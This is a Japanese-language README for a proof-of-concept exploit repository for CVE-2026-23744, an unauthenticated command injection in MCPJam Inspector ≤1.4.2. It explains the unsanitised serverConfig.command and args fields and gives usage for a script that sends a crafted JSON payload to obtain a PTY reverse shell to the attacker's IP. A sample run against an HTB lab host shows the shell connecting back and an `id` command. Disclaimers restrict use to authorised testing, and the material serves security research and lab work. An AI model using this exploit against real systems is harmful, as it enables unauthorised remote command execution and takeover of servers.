
CVE-2026-23744 は、MCPJam Inspector ≤1.4.2 の /api/mcp/connect における未認証のコマンドインジェクションです。このPOCは、細工したJSONペイロードを送信して任意のコマンドを実行させ、PTY付きリバースシェルを取得することでこれを悪用します。
この概念実証コードは、許可を得たセキュリティ研究、教育目的、および管理されたラボ環境(例: HTB、CTF、明示的な書面による同意を得た社内ペネトレーションテスト)専用に提供されています。許可なくいかなるシステムに対しても使用することは違法かつ非倫理的です。作者は悪用によって生じるいかなる責任も負いません。利用者は、適用されるすべての法律および規制を遵守する単独の責任を負います。
CVE-2026-23744 は、MCPJam Inspector(バージョン ≤ 1.4.2)における認証不要のコマンドインジェクションの脆弱性です。
/api/mcp/connect エンドポイントは、serverConfig.command および serverConfig.args を含む JSON ペイロードを受け取り、それらをサニタイズ処理なしで直接システムプロセスの起動に渡します。攻撃者は細工したリクエストを送信して任意のシステムコマンドを実行し、サービスユーザーの権限でリバースシェルを取得できます。
このリポジトリには、オプションの自動 PTY ベース対話型リスナー(デフォルトで有効)を備えた完全な動作するエクスプロイトスクリプトが含まれています。
requests ライブラリ(pip install requests)重要: ホスト名または IP のみを指定してください。スクリプトが自動的に http:// または https:// を追加します。
python3 exploit.py -t <target> -l <your_ip> [-r <port>] [--ssl] [--check-only]
| オプション | 説明 |
|---|---|
-t, --target | ターゲットのホスト名または IP(必須) |
-p, --port | ターゲットのポート(デフォルト: 6274) |
-l, --lhost | リバースシェル用の自分の IP(必須) |
-r, --lport | リスナーポート(デフォルト: 4444) |
--ssl | HTTP の代わりに HTTPS を使用 |
--check-only | 脆弱性の確認のみ行い、シェルを送信しない |
スクリプトが独自のリスナーを起動し、ターミナル上で直接シェルを提供します。
python3 exploit.py -t <example_hostname> -l <your_IP> -r <Listener_Port>
$ python3 exploit.py -t devhub.htb -l 10.10.14.111 -r 4444
[*] Target URL: http://devhub.htb:6274/api/mcp/connect
[*] Checking target...
[+] Target responded with 400 – appears vulnerable
[*] Sending exploit payload...
[+] ReadTimeout – shell likely spawned!
[*] Payload sent. Check your listener!
# On your listener:
connect to [10.10.14.111] from (UNKNOWN) [10.129.245.216] 54150
mcp-dev@devhub:/opt/mcpjam$ id
uid=1001(mcp-dev) gid=1001(mcp-dev) groups=1001(mcp-dev)
root では実行しない。このリポジトリは、教育および許可を得たテスト目的のみに提供されています。自己責任で使用してください。
作者: Mluex0 日付: 2026年8月